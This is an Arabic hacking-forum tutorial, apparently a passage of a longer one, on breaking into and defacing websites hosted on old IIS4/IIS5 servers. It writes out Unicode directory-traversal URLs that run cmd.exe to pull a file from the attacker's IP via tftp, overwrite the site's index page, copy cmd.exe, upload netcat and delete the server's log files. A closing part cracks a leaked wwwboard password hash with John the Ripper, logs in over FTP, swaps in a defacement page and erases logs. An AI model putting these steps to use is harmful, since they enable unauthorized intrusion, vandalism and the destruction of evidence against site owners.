[ فقط المشتركين فى المنتدى يمكنهم رؤية الرابط . اضعط هنا للتسجيل ... ] /..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+t ftp.exe+"-i"+y.y.y.y+GET+index.htm+C:inetpubwwwrootindex. htm
حيث
-------
tftp.exe هو البرنامج المستخدم للرفع
"i-" براميتر
y.y.y.y رقم الايبي الخاص بك
و الباقي على ما اظن لا يحتاج توضيح ..
C:inetpubwwwrootindex.htm
هو الوضع الافتراضي كما ذكرت لكن ممكن ان يختلف من موقع لاخر فلابد من التاكد اولا
و اخيرا لمسح اللوق
[ فقط المشتركين فى المنتدى يمكنهم رؤية الرابط . اضعط هنا للتسجيل ... ] /..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+d el+c:/winnt/system32/logfiles/*.log
هذا تقريبا كل ما يخص سيرفرات الويندوز و ال
IIS
اما بالنسبه للمواقع التي سيرفراتها على سبيل المثال : Apache on linux
فطريقة التفكيير ستتغير كليا ماعدا الاختراق عن طريق ال
ftp server
فمعظم نسخ ال
ftp
لها ثغرات يمكن استغلالها.
5 - شرح ثغرة اليونيكود وكيفية استغلالها:
اولا ثغرات اليونيكود:
UNICODE - Internet Information Service IIS4 - IIS5
اليونيكود – نظام خدمة المعلومات للانترنت الاصدار الرابع – الخامس
- تعريف باليونيكود .
اليونيكود عبارة عن مجموعة من الثغرات في مجموعة خدمة المعلومات التي ركبت مع
IIS4.0 / IIS5.0
والذي ياتي عادة مع
NT4 / Win2k .
- كيفية ايجاد هذه الثغرات .
يتم ايجاد هذه الثغرات بطريقتين :-
1- بواسطة البرامج اللازمة والمخصصة لكشف هذه الثغرات سواء بالبرامج
التي تعمل على نظام ويندوز او بطريقة الشل والتي تعمل على نظام لينكس .
2- بواسطة تطبيق الثغرة على الموقع مباشرة .
- كيف يتم استغلال ثغرات اليونكود .
عند تطبيق الثغرة على نظام الـ
IIS4 / IIS5
يبدا ملف
CMD
بفك شفرة اليونكود في المثال الخطاء ومن هنا يتم استغلالها .
الاوامر المستخدمة بواسطة ملف
.CMD
الاوامر المستخدمه بواسطة ملف الـ
CMD
وهي امر لانشاء دليل جديد وامر لالغاء دليل وامر النسخ وامر النقل وامر الحذف وامر تغيير
اسماء الملفات وامر لرؤية محتويات الملف وامر الكتابة داخل أي ملف وامر لسحب أي ملف ، وهي حسب الامثلة التالية :-
امر انشاء دليل جديد [ فقط المشتركين فى المنتدى يمكنهم رؤية الرابط . اضعط هنا للتسجيل ... ]
امر الغاء دليل [ فقط المشتركين فى المنتدى يمكنهم رؤية الرابط . اضعط هنا للتسجيل ... ]
للمعلومية:لايمكن الغاء أي دليل الا اذا كان فارغاً تمام من الملفات والمجلدات.
الامر المستخدم للنسخ [ فقط المشتركين فى المنتدى يمكنهم رؤية الرابط . اضعط هنا للتسجيل ... ]
**************************************************
الامر المستخدم للنقل [ فقط المشتركين فى المنتدى يمكنهم رؤية الرابط . اضعط هنا للتسجيل ... ]
**************************************************
الامر المستخدم للحذف [ فقط المشتركين فى المنتدى يمكنهم رؤية الرابط . اضعط هنا للتسجيل ... ]
**************************************************
الامر المستخدم لتغيير مسمى الملفات [ فقط المشتركين فى المنتدى يمكنهم رؤية الرابط . اضعط هنا للتسجيل ... ]
**************************************************
الامر المستخدم لرؤية محتويات الملف [ فقط المشتركين فى المنتدى يمكنهم رؤية الرابط . اضعط هنا للتسجيل ... ]
**************************************************
الامر المستخدم للكتابة داخل أي ملف [ فقط المشتركين فى المنتدى يمكنهم رؤية الرابط . اضعط هنا للتسجيل ... ] r_hEx+>c:\hEx.txt
الامر المستخدم لعملية سحب أي ملف
عليك القيام اولاً بنسخ الملف المراد سحبه الى أي دليل وبعدها يتم كتابة اسم الملف في اخر العنوان كالتالي [ فقط المشتركين فى المنتدى يمكنهم رؤية الرابط . اضعط هنا للتسجيل ... ]
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-طريقة تطبيق هذه الثغرات .
تطبيق الثغرة على الموقع من خلال المتصفح تتم حسب الامثلة التالية :-
وقد نحتاج الى تغيير مسمى الدليل بحيث يكون :-
Msadc , _vti_bin , iisadmpwd , _vit_admin , scripts , samples , cgi-bin
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-كيفية اختصار ثغرة اليونيكود حتى تتمكن من تفعيل امر الـ ECHO .
في حالة اكتشاف موقع يعاني من مشكلة اليونيكود ولنفترض انه كان على هذه الثغرة :- [ فقط المشتركين فى المنتدى يمكنهم رؤية الرابط . اضعط هنا للتسجيل ... ]
فنحتاج الى نسخ ملف
w3svc.exe
الى مجلد
inetpub\scripts
والامر يكون بهذه الطريقة: [ فقط المشتركين فى المنتدى يمكنهم رؤية الرابط . اضعط هنا للتسجيل ... ]
بعد نسخ ملف
w3svc.exe
الى مجلد
inetpub\scripts
الان نقوم بتصفح الموقع من خلال الثغرة بهذه الطريقة [ فقط المشتركين فى المنتدى يمكنهم رؤية الرابط . اضعط هنا للتسجيل ... ]
الان نستطيع الكتابة داخل أي ملف وبالتحديد الملف الرئيسي للموقع الذي غالبا مايكون في هذا الدليل
inetpub\wwwroot\index.htm
بحيث يكون الامر بالشكل التالي :- [ فقط المشتركين فى المنتدى يمكنهم رؤية الرابط . اضعط هنا للتسجيل ... ] om+>+c:\inetpub\wwwroot\inde x.htm
طيقة نسخ ملف ال
CMD
نسخه الى مجلد السيكربت بهذه الطريقة :- [ فقط المشتركين فى المنتدى يمكنهم رؤية الرابط . اضعط هنا للتسجيل ... ]
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
الان بامكاننا استخدام ملف الـ
CMD
الجديد في الثغرة بدلا من الاول بهذا الشكل [ فقط المشتركين فى المنتدى يمكنهم رؤية الرابط . اضعط هنا للتسجيل ... ]
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
كيفية معرفة مشكلة الـ Access Denied
والحلول المتبعة لها .
تتم معرفة مشكلة الـAccess Denied
من خلال المحاولة في حذف أي ملف من أي امتداد ، فعند ظهور رسالة الـ
Access Denied
فاليك هذه الطرق حتى تتمكن من الكتابة على الملفات والتحكم اكثر على السيرفر :-
1-لطريقة الاولى نسخ ملف الـ
CMD
الى دليل السيكربت بمسمى
CMD1
فسوف يتاح لك امكانية الكتابة باستخدام الامر
Copy
باستخدام هذا الامر [ فقط المشتركين فى المنتدى يمكنهم رؤية الرابط . اضعط هنا للتسجيل ... ]
- الطريقة الثانية بالتعامل مع الملف2
ssinc.dll
والطريقة كما يلي
اولا انشاء صفحة باسم
test.shtml
تكون هذه الصفحة داخل مجلد
wwwroot/hEx/test.shtml
كتابة هذا الكود داخل الصفحة بحيث ان حرف
A
يتم كتابتة حتى يتعدى 2049 حرف
الان يتم طلب الصفحة من خلال المتصفح [ فقط المشتركين فى المنتدى يمكنهم رؤية الرابط . اضعط هنا للتسجيل ... ]
الان سوف تظهر لك الصفحة
الان تستطيع الكتابه وتم تخطي مشكلة الـ
Access Denied
اذا ظهرت لك صفحة الخطاء رقم 500 فمعناها انك لم تقم بتطبيق الطريقة بالشكل الصحيح وعليك اعادة المحاولة .
3-الطريقة الثالثة باستخدام برنامج
NC.exe
بحيث يتم عمل اب لوود لهذا الملف داخل مجلد الـ
Temp
في دليل الويندوز ومنه يتم تنفيذ الاوامر من خلال موجة الدوز وللمعلومية مجلد الـ
Temp
مفتوح لعمليات الاب لوود .
4-الطريقة الرابعة وهي من خلال عمل كراش للسيرفر باستخدام البرامج اللازمة لهذا الغرض وهذه الطريقة غير مجديه في كثير من الاحيان .
5-البحث عن ملفات
root.exe ، sensepost.exe ، shell.exe ، w3svc.exe ونسخها الى مجلد c:\inetpub\scripts
وتطبيق الثغرة من خلالها .
البرامج اللازمة:
Jonh the rippar
WS_FTP pro
المام كامل بطريقة عمل لوحة التحكم الكونترول سي بانل
-------------------------
1- تبين ان موقعك فيه ثغرة ملف الباسورد: [ فقط المشتركين فى المنتدى يمكنهم رؤية الرابط . اضعط هنا للتسجيل ... ]
wwwboard/passwd.txt
الان ننفذ الثغرة [ فقط المشتركين فى المنتدى يمكنهم رؤية الرابط . اضعط هنا للتسجيل ... ]
نجد اليوزر نيم والباسوورد:
sk:GXQ4cN0fhbptw
sk
اليوزر نيم
GXQ4cN0fhbptw
هذا الباسوورد بس مشفركيف نفك تشفيره للحصول على الباسوورد الاصلي؟؟؟
طبعا ببرنامج جون ذاريبر .
اوكي فكينا التشفير والان صار لدينا الباسوورد واليوزر نيم الخاص بالموقع تمت عمليه الاختراق.
طبعا ببرنامج الفتب
WS_FTP PRO
نضع الباسوورد واليوزر نيم بالبرنامج وندخل على الريموت الخاص الموقع .
لمسح الموقع طبعا تمحي الملفات او تغيير الصفحة الرئيسية- في بين الملفات ملف اسمه
index.html
هذا ملف الصفحة الرئيسية للموقع يمكنك تبديلها بعد ان تكون قد صممت صفحة بديلة ببرنامج الفرونت بيج والذي ستجد شرح وافي له بالعودة الى برنامجنا الموسوعة التعليمية:
تم اختراق موقعك وتركت رساله لك بهذا الصدد ....
حتى لا تستطيع معرفة المخترق فانه يقوم بمسح ملفات اللوقو اللي شرحت .
